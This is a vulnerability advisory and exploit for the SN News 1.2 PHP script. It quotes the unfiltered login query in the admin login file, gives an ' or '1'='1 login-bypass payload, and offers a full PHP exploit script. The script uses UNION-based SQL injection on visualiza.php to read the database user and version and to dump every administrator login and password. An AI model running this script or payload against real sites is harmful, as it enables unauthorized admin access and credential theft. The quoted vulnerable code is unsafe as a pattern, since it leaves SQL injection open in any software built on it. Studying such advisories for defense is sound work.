SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability 
 
影响版本 1.2 
 
下载地址: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news 
     作者不为任何危害负责

############################################################################## 
 
## 缺陷位于- /admin/logar.php [4-15]: 
 
4.$login = $_POST["login"]; 
 
5.$senha = $_POST["senha"]; 
 
6.$sql   = "select * from news_adm where login='$login' AND senha='$senha'"; 
 
7.$query = mysql_query($sql); 
 
8.$nr    = mysql_num_rows($query); 
 
9.if($nr>0){ 
 
10.$_SESSION["admin"] = "on"; 
 
11.echo "<script> 
 
12.location.href='../' 
 
13.</script> 
 
14."; 
 
15.} 
 
## 注释: 
 
## As you can see there is no validation or any filter to variables $login and $senha. 
 
## See line 6, so you can inject sql query by using $login and $senha variables. 
 
## SQL Injection PoC: 
 
## http://www.2cto.com /sn_news/admin/login.htm 
 
## Login: ' or '1'='1 
 
## Senha: ' or '1'='1 
 
## This injection will bypass the admin login screen. 
 
 
 
 
 
 
 
 # 标题: SN News <= 1.2 SQL Injection 
 

 
 
<?php 
 
/* 
 示例: 
 
$ php mnews.php http://www.2cto.com /scripts/mnews/ 
 
  
 
*/
 
  
 
error_reporting(E_ERROR); 
 
set_time_limit(0); 
 
@ini_set("default_socket_timeout", 30); 
 
   
 
function hex($string){ 
 
    $hex=''; // PHP 'Dim' =] 
 
    for ($i=0; $i < strlen($string); $i++){ 
 
        $hex .= dechex(ord($string[$i])); 
 
    } 
 
    return '0x'.$hex; 
 
} 
 
  
 
  
 
echo "\nSN News <= 1.2 SQL Injection exploit\n"; 
 
echo "Discovered and written by WhiteCollarGroup\n"; 
 
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n"; 
 
  
 
if($argc!=2) { 
 
    echo "Usage: \n"; 
 
    echo "php $argv[0] <target url>\n"; 
 
    echo "Example:\n"; 
 
    echo "php $argv[0] http://www.website.com/snnews\n"; 
 
    exit; 
 
} 
 
  
 
$target = $argv[1]; 
 
if(substr($target, (strlen($target)-1))!="/") { 
 
    $target .= "/"; 
 
} 
 
$inject = $target . "visualiza.php?id=-0'%20"; 
 
  
 
$token = uniqid(); 
 
$token_hex = hex($token); 
 
  
 
echo "[*] Trying to get informations...\n"; 
 
$infos = file_get_contents($inject.urlencode("union all select 1,concat(".$token_hex.", user(), ".$token_hex.", version(), ".$token_hex."),3,4,5-- ")); 
 
$infos_r = array(); 
 
preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r); 
 
$user = $infos_r[1][0]; 
 
$version = $infos_r[2][0]; 
 
if($user) { 
 
    echo "[*] MySQL version: $version\n"; 
 
    echo "[*] MySQL user: $user\n"; 
 
} else { 
 
    echo "[-] Error while getting informations.\n"; 
 
} 
 
  
 
echo "[*] Getting users...\n"; 
 
$i = 0; 
 
while(true) { 
 
    $dados_r = array(); 
 
    $dados = file_get_contents($inject.urlencode("union all select 1,concat(".$token_hex.", login, ".$token_hex.", senha, ".$token_hex."),3,4,5 from news_adm limit $i,1-- ")); 
 
    preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r); 
 
    $login = $dados_r[1][0]; 
 
    $senha = $dados_r[2][0]; 
 
    if(($login) AND ($senha)) { 
 
        echo "-+-\n"; 
 
        echo "User: $login\n"; 
 
        echo "Pass: $senha\n"; 
 
    } else { 
 
        break; 
 
    } 
 
    $i++; 
 
} 
 
  
 
echo "-+-+-\n"; 
 
if($i!=0) { 
 
    echo "[!] Admin login: {$target}admin/\n"; 
 
} else { 
 
    echo "[-] Exploit failed. Make sure that's server is using a valid version of SN News without Apache mod_security.\nWe're sorry."; 
 
} 
 
echo "\n";